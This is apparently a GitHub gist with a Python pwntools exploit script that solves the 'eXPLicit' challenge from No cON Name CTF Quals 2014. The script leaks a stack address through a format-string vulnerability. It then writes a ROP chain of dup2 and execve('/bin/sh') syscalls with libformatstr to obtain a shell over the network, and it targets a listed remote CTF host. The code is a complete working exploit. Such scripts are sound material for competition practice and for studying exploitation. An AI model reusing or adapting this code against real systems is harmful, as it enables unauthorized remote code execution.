Skip to content

Instantly share code, notes, and snippets.

@akiym
Last active Aug 29, 2015
Embed
What would you like to do?
No cON Name CTF Quals 2014 - eXPLicit
# -*- coding: utf-8 -*-
import os
import sys
import time
import re
from pwn import *
from libformatstr import *
REMOTE = 0
if REMOTE:
host = '88.87.208.163'
port = 7070
else:
host = '127.0.0.1'
port = 7070
def connect():
return remote(host, port)
def retrieve_val(res):
m = re.search('Your number is (.+) which is too low.', res)
if m:
leak = m.group(1)
return leak
else:
return None
def dump_stack():
for i in range(1, 100):
payload = (
"%%%d$x" % i +
'\n'
)
s.sendafter('Pick a number between 0 and 20: ', payload)
res = s.recvuntil('which is too low.')
leak = retrieve_val(res)
if leak:
print '%d: %s' % (i, leak)
else:
print buf
s.interactive()
def send_fmt(payload):
s.sendafter('Pick a number between 0 and 20: ', payload + '\n')
bss = 0x80d6080 + 0x100
int80 = 0x8082715 # int 0x80; ret
popeax = 0x80a8ff6 # pop eax; ret
popecx_ebx = 0x8060a7d # pop ecx; pop ebx; ret
popedx_ecx_ebx = 0x8060a7c # pop edx; pop ecx; pop ebx; ret
s = connect()
#dump_stack()
send_fmt('%69$x')
buf = s.recvuntil('which is too low.')
retaddr = int(retrieve_val(buf), 16) - 76 # offset
log.info('retaddr = %x' % retaddr)
# dup2(4, 0)
p = FormatStr()
p[retaddr] = [popeax, 0x3f, popecx_ebx, 0, 0x4, int80]
send_fmt(p.payload(6))
retaddr += 4*6
# dup2(4, 1)
p = FormatStr()
p[retaddr] = [popeax, 0x3f, popecx_ebx, 1, 0x4, int80]
send_fmt(p.payload(6))
retaddr += 4*6
# execve("/bin/sh", ["/bin/sh", NULL], NULL)
p = FormatStr()
p[retaddr] = [popeax, 0x0b, popedx_ecx_ebx, 0, bss, bss+4*2, int80]
send_fmt(p.payload(6))
# ["/bin/sh", NULL]
p = FormatStr()
p[bss] = [bss+4*2, 0, '/bin/sh']
send_fmt(p.payload(6))
s.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment